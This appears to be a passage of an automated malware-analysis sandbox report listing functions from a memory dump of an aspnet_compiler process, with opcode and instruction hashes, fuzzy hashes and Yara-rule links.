                                                      • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                      • Instruction ID: 158e084d13c291ce42b7bf75b128ab06cfe09dce7679fc5d4c825a9dc4422610
                                                      • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                      • Instruction Fuzzy Hash: 5DF06572204204DFE3298F09D984F52B7F8EB1A765F45C069E6099B661D379EC40DFA4
                                                      Function 01AB0710 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                      • Instruction ID: 42e9d39f0dda097c1fb76e5aae1722c34383243fdfd79a9ae2f2bf6a27d1e755
                                                      • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                      • Instruction Fuzzy Hash: 9CF0E539204B819BDB1ACF19C190AD6BBF8FB51350F0444D4F8468B352D731E9C2CB50
                                                      Function 01AE49D0 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                      • Instruction ID: d476f3aa9ce4420087ec6d112fdcc9c9d87e4470872beac6c5fd305746011f09
                                                      • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                      • Instruction Fuzzy Hash: 35E0D832744145AFD3211A598818B667FEEDBD87F0F150429E200CB150DB70DC40C7D8
                                                      Function 01B84164 Relevance: .0, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bcdcf97cec59490a61132c4629eddaf826f513c51a9da08f7b61ffd036057089
                                                      • Instruction ID: c2371d8c0c0b3db3ba612af5e251bb35667c0eda1603c21a2478307c1ef289ab
                                                      • Opcode Fuzzy Hash: bcdcf97cec59490a61132c4629eddaf826f513c51a9da08f7b61ffd036057089
                                                      • Instruction Fuzzy Hash: 29F06D31A2AA938FE77AF72DE684B567FE4EF10E30F9A05E4D44587952C724EC80C650
                                                      Function 01B5678E Relevance: .0, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                      • Instruction ID: 0a495ff303b1fc8c0540f298fa19f6639044a7d07ccc4d012e4bc8a8e28072ac
                                                      • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                      • Instruction Fuzzy Hash: D0E0DF72A00110FBEB219799CE05F9ABFACDB94FA0F050194FA00E7090E630EE00C690
                                                      Function 01B808C0 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                      • Instruction ID: 0a078d4340c0ca874b7809725ff4e13b67a405ac449abc29eca4afcfb4681f2e
                                                      • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                      • Instruction Fuzzy Hash: D6E09B316513508BCB29BA1DC540A53B7E8DF95AA1F1580E9E90547612C331F887C6D0
                                                      Function 01AB25E0 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a1c2839884b0141afdcdac42122c4855e4fe10eed0a52cbdafd78d649744c46c
                                                      • Instruction ID: eae1dbd99fd5c8a5505bc5c932aa2e541ac1bbb068460eb6cb4dfee25c425f41
                                                      • Opcode Fuzzy Hash: a1c2839884b0141afdcdac42122c4855e4fe10eed0a52cbdafd78d649744c46c
                                                      • Instruction Fuzzy Hash: 4EE092721005949BC721BF29DE41FDA7B9AEF64760F01451AF11657191CB30B810C784
                                                      Function 01B6A456 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                      • Instruction ID: 78876262e0ffc645c82eeb305209d41723505c4554ccb75046ba27258aa376dc
                                                      • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                      • Instruction Fuzzy Hash: 4DE01231010A52DFEB366F3ADE48B56BAE5FF60B11F148C6DE196264B0C779D8C1CA40
                                                      Function 01B34000 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                      • Instruction ID: 6df7d93a54769f6f74a6394dc340b70d286e239823c61c287276bfb97cc27ab4
                                                      • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                      • Instruction Fuzzy Hash: 6DE052793003459FE719CF19C054B66BBB6FFD9A50F28C0A9A9488F205EB36E852CB51
                                                      Function 01AECA38 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 171a582530e72054139fe4b2bfaf921c5fb72bb456a363575702be35a3bd55a7
                                                      • Instruction ID: 3a8c14fa54b6f3ba469d251eab54d46767e688ea2e74d3dd59efac7671bfa948
                                                      • Opcode Fuzzy Hash: 171a582530e72054139fe4b2bfaf921c5fb72bb456a363575702be35a3bd55a7
                                                      • Instruction Fuzzy Hash: 45D02B725811206ACB35F2197D08F933ADB9B50670F054861F10893014D524CC8197C4
                                                      Function 01AA823B Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                      • Instruction ID: e57f1ecbae618b00f3c2963ceef024db7f68c5e324380c7770d206f5bbcd2f19
                                                      • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                      • Instruction Fuzzy Hash: 34E08C31044A14EEDB322F15DE00B61BAA1FF64F11F14886EF181170A48779A889CA44
                                                      Function 01AB2050 Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c97267b3f575f3aae907c93bbf8a8c756b4e34258c7351dcc60e90fcd917cb8d
                                                      • Instruction ID: 72a3267f3191dcf1b2322957329223565516c18bfe1b406580fc7d181e2c4a11
                                                      • Opcode Fuzzy Hash: c97267b3f575f3aae907c93bbf8a8c756b4e34258c7351dcc60e90fcd917cb8d
                                                      • Instruction Fuzzy Hash: 75E08C321004906BC711FA5DDE51F9A739EEFA4660F044226F15197291CA20BC00C794
                                                      Function 01AE8A90 Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                      • Instruction ID: 59acb9d7fa318bb49b63985ebc073bb9bbee1cc39dacc8fd1d312b96324bafa0
                                                      • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                      • Instruction Fuzzy Hash: 16E08633111A1487C728DE18D515B7277E4EF45720F09463EE61347790C534E544C794
                                                      Function 01B06AA4 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                      • Instruction ID: a073ddb89d79841198a3163261d318ccb815524bea6e05c5d17f5ac56abc4e2a
                                                      • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                      • Instruction Fuzzy Hash: 0FD05E36511A50AFC7329F1BEA00C53BBF9FFC4F60705066EA54583920C770A846CBA0
                                                      Function 01AEE59C Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                      • Instruction ID: b467d5e157198fc838ead3153ccedd05926df797bc0e859d69952399d4cb9cfa
                                                      • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                      • Instruction Fuzzy Hash: CFD0A932208620ABDB32AA1CFC00FD333E8BB88B20F060499F00CC7050C360AC81CA84
                                                      Function 01B2E908 Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                      • Instruction ID: 06edfa74ff26eb421f215a4e3ae4c318020e29d7cd43d77ff29a4607d216b827
                                                      • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                      • Instruction Fuzzy Hash: 5EE0EC35A506849FDF16DF9AC640F9EBBB9FB94B40F150058E5086B661C734E904CB40
                                                      Function 01AAA0E3 Relevance: .0, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                      • Instruction ID: aa4f88f4174a9b8903d4a277b7d102d2d4a1bc82470249b3e9dda93264e9950b
                                                      • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                      • Instruction Fuzzy Hash: 07D02232316030A3CF2897556900FAB6955AF80AA0F0A002D340AA3800C2048C42C2E0
                                                      Function 01AEA830 Relevance: .0, Instructions: 14COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                      • Instruction ID: 55c576427c72930a577e2b0e1f2ce40851695db2ee49cb755cbbe8f0fb096c69
                                                      • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                      • Instruction Fuzzy Hash: 55D012371D054DBBCB119F66DD01FA57BA9EB64BA0F448020B504875A0C63AE950D584
                                                      Function 01AECA24 Relevance: .0, Instructions: 14COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51addb58dcc16d3a7c4423ff79d437b4ef5a32486159eba029ec606f1c319021
                                                      • Instruction ID: e6799e4895ae886e9f79eb7579f968ea6105983458fa16af9d7d4a35c4066fe9
                                                      • Opcode Fuzzy Hash: 51addb58dcc16d3a7c4423ff79d437b4ef5a32486159eba029ec606f1c319021
                                                      • Instruction Fuzzy Hash: 95D052306050128BDF2BEF0CCA1AAAE3AF1EB10A40F8400ACE601A2820E328D8018A00
                                                      Function 01AC02A0 Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                      • Instruction ID: e4f522411066833b7f6027ddb9a7c5cc510c628aade6bbfbfdd512b92452b97d
                                                      • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                      • Instruction Fuzzy Hash: 59D09239216A80CFD61A8B0CC6A4B1533A4BB44F44F810494E542CBB22E738D940CA00
                                                      Function 01AEC700 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                      • Instruction ID: 39c6356e3b218ec3ec5d3e0875b087b78aaaacf5de10ef8f48bdeb252cc69b92
                                                      • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                      • Instruction Fuzzy Hash: 72C01232294648AFCB12AA99CE01F567BA9EBA8B40F004021F2048B670C631E820EA84
                                                      Function 01AD0310 Relevance: .0, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                      • Instruction ID: 945f9f359f3150a890a83dd0a908ced02616fd7974c9df93719e511b2101eb68
                                                      • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                      • Instruction Fuzzy Hash: 0CD01236100648EFCB01DF41C990D9A772AFBD8710F109019FD1A076108A31ED62DA50
                                                      Function 01AB0750 Relevance: .0, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                      • Instruction ID: ba5618fea5925754fff37e5b6a882f0acd3271be4eb2f86f45c59d4af3fcafe9
                                                      • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                      • Instruction Fuzzy Hash: C0C00179601A428BCF2ADA2AD294A897BE4FB44B40F158894E8058BA22E625E805CA10
                                                      Function 01AF4340 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b43cbe1bdcb8e10c698f962277132892c8a30dd586c7d7df7e37fdea6b56ab73
                                                      • Instruction ID: a12443446d09224e728f8999279bf5d5caf9e78f602ed6201a16c79eeafef76f
                                                      • Opcode Fuzzy Hash: b43cbe1bdcb8e10c698f962277132892c8a30dd586c7d7df7e37fdea6b56ab73
                                                      • Instruction Fuzzy Hash: 70900232A05C00529145715848845464405A7E0341B55C051E0424599CCB148B965361
                                                      Function 01AF4650 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef48d3dee61833e0455841e0436e7a38f1afb0a3d8a717206c54312fdfcb5e58
                                                      • Instruction ID: e703d5ef34a8f9766725669a971cddb0da5a9b506aa7fe589aa9ccb8eb0ce052
                                                      • Opcode Fuzzy Hash: ef48d3dee61833e0455841e0436e7a38f1afb0a3d8a717206c54312fdfcb5e58
                                                      • Instruction Fuzzy Hash: 21900262A01900824145715848044066405A7E1341395C155A05545A5CC7188A959369
                                                      Function 01AF2BA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cb24a0fb3495b775a1e35f9d45a0fceac8b225d336e59759c6826cd7439d4c04
                                                      • Instruction ID: ced731cc928cfa143a19720919211be567d4689f0956f32bd92dd1747561110f
                                                      • Opcode Fuzzy Hash: cb24a0fb3495b775a1e35f9d45a0fceac8b225d336e59759c6826cd7439d4c04
                                                      • Instruction Fuzzy Hash: AA900232A0580842D15571584414746040597D0341F55C051A0024699DC7558B9577A1
                                                      Function 01AF2B80 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 846802bf6f6255640368420433303c5fd5f09099e0ee80c26d2f32e8dc4aca3b
                                                      • Instruction ID: ad1a6fa0815f026d9ad99fc5011f1abf5ea8d1ea3c8438e3ac660859a09a8d8c
                                                      • Opcode Fuzzy Hash: 846802bf6f6255640368420433303c5fd5f09099e0ee80c26d2f32e8dc4aca3b
                                                      • Instruction Fuzzy Hash: 2590023260180842D10971584804686040597D0341F55C051A602469AED7658AD17231
                                                      Function 01AF2BE0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8435e5a7056b0c8689feb77a97e9dccdeec74bcfeca016f11c71697055ce34a3
                                                      • Instruction ID: 15516548470ec48ef1d3419e9a71eba73f05c6a52ce0b5bcd8d36894af013707
                                                      • Opcode Fuzzy Hash: 8435e5a7056b0c8689feb77a97e9dccdeec74bcfeca016f11c71697055ce34a3
                                                      • Instruction Fuzzy Hash: FD90023260584882D14571584404A46041597D0345F55C051A00646D9DD7258F95B761
                                                      Function 01AF2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: da4093725da007f47b0569a1f7968c934daaf0d3c61ff0b3e3ce01047b4b39e8
                                                      • Instruction ID: a787c8704dc1b662fff80193c6c8a817af6f8f963a911a7f5f2e4f3ff8b5c5a1
                                                      • Opcode Fuzzy Hash: da4093725da007f47b0569a1f7968c934daaf0d3c61ff0b3e3ce01047b4b39e8
                                                      • Instruction Fuzzy Hash: 9090023260180842D1857158440464A040597D1341F95C055A0025699DCB158B9977A1
                                                      Function 01AF2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c60a789e449657a5dd6de8bac6be97ed77ae8785bf166f0a837bdc70a1f3de5
                                                      • Instruction ID: bac177237088708c79e3e084b29b6a71a866b31d5ca82231a11d8d1ae8f23b85
                                                      • Opcode Fuzzy Hash: 4c60a789e449657a5dd6de8bac6be97ed77ae8785bf166f0a837bdc70a1f3de5
                                                      • Instruction Fuzzy Hash: 1A9002A2601940D24505B2588404B0A490597E0241B55C056E10545A5CC6258A919235
                                                      Function 01AF2AF0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a5d330f372cad1043599477ea9bc9d1dca98cb34d053b26776f2f69c2bf645c2
                                                      • Instruction ID: 71fe7fcd46c21bd3f7af364d6472a49690d192cc20b30bc9eceac01b21c4195f
                                                      • Opcode Fuzzy Hash: a5d330f372cad1043599477ea9bc9d1dca98cb34d053b26776f2f69c2bf645c2
                                                      • Instruction Fuzzy Hash: C690022662180042014AB558060450B0845A7D6391395C055F14165D5CC7218AA55321
                                                      Function 01AF2AD0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2cf001f3bf81c96ccf95a41d9d6a8b0b4f6d8823517c08ba0d2a6f39fdd24825
                                                      • Instruction ID: a3c272fc3d6753fe34b9cc7c6855d88a1e06743edefd4e4e3b63caa25826aef2
                                                      • Opcode Fuzzy Hash: 2cf001f3bf81c96ccf95a41d9d6a8b0b4f6d8823517c08ba0d2a6f39fdd24825
                                                      • Instruction Fuzzy Hash: 9790022661180043010AB5580704507044697D5391355C061F1015595CD7218AA15221
                                                      Function 01AF2DB0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
